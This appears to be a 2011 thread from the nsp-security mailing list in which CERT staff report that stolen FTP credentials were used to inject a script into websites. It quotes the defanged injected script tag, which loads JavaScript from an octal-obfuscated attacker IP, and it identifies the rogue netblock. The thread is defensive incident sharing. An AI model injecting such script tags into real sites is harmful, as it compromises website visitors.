[nsp-sec] Stolen FTP credentials
Carles Fragoso
cfragoso at cesicat.cat
Wed Mar 16 11:50:23 EDT 2011
Hi Thomas,
Several ISPs here in Spain have confirmed us this behaviour ...
... same inserted script ...
< script src='hxxp://0133.0331.0242.0034/0314.php?js'>< / script >
... performed through FTP connnections (downloading index file and uploading it with modified code) from a couple of different IP addresses (Romania and USA).
Those who have replied my notification, have confirmed that the credentials were fresh and were accessed.
Regards,
-- Carlos Fragoso (CESICAT-CERT)
On Mar 16, 2011, at 4:16 PM, Thomas Hungenberg wrote:
----------- nsp-security Confidential --------
It appears the stolen FTP credentials are used to inject the following code
into corresponding websites (XXX inserted):
<scrXXipt src='htXXXtp://0133.0331.0242.0034/0314.php?js'></scrXXXipt>
0133.0331.0242.0034 = 91.217.162.28
Known rogue netblock:
inetnum: 91.217.162.0 - 91.217.162.255
netname: VOEJNA-NET
descr: Voejkova Nadezhda
country: UA
Cheers,
Thomas
Thomas Hungenberg schrieb:
----------- nsp-security Confidential --------
Hi,
please find below a list of stolen FTP credentials found in recent dropzone data.
Format: ASN | IP | CC | hostname | username | sanitized password
- Thomas
CERT-Bund Incident Response & Anti-Malware Team
_______________________________________________
nsp-security mailing list
nsp-security at puck.nether.net<mailto:nsp-security at puck.nether.net>
https://puck.nether.net/mailman/listinfo/nsp-security
Please do not Forward, CC, or BCC this E-mail outside of the nsp-security
community. Confidentiality is essential for effective Internet security counter-measures.
_______________________________________________
More information about the nsp-security
mailing list